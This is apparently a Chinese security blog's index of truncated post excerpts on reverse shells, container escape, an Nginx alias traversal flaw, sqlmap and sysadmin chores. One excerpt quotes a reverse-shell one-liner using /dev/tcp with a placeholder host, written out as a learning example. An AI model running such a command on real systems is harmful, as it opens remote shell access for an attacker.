在对车机的Linux系统做用户最小化检查时遇到用户复杂、不好判断的情况。大部分系统中会运行着各种服务进程，这些服务会创建各种用户用来专门运行各自的进程...

今天在学习反弹shell，遇到一个经典的构造： /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解，为什...

想研究的课题是容器的渗透，一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器，通过何...

漏洞介绍 Nginx在配置alias的时候，如果location最后不是以斜杠结尾，而alias以斜杠结尾，那么将出现目录穿越漏洞。 通过实验了解漏洞 实验靶场用...

使用宝塔自带的php扩展安装功能，安装memcached失败，截取报错信息最后一段： checking whether to enable memcached msgpack serializer support... no ...

使用pip安装sqlmap遇到问题，报错信息： error: could not open 'sqlmaplibcoresettings.py': Permission denied 文件没有权限，下载程序包使...

level 参数 简单说，--level参数决定了sqlmap在检测SQL注入时的“努力程度”。 level 1：默认的level等级，会测试GET和POST请求中的参数。 level 2...

题目 链接 取近似值_牛客题霸_牛客网 (nowcoder.com) 描述 写出一个程序，接受一个正浮点数值，输出该数值的近似整数值。如果小数点后数值...

某次在使用AES在线加密网站的时候遇到了两个问题： 相同明文和密钥的情况下，每次加密结果不一致，但都可以正常解密出相同的明文。 密钥长度无需指定...

经常通过微信把图片从手机传到电脑上，导致很多图片都是“微信图片_XXX”这种形式的文件名，在URL中不美观。所以希望给博客添加自动重命名上传文件的功能。 ...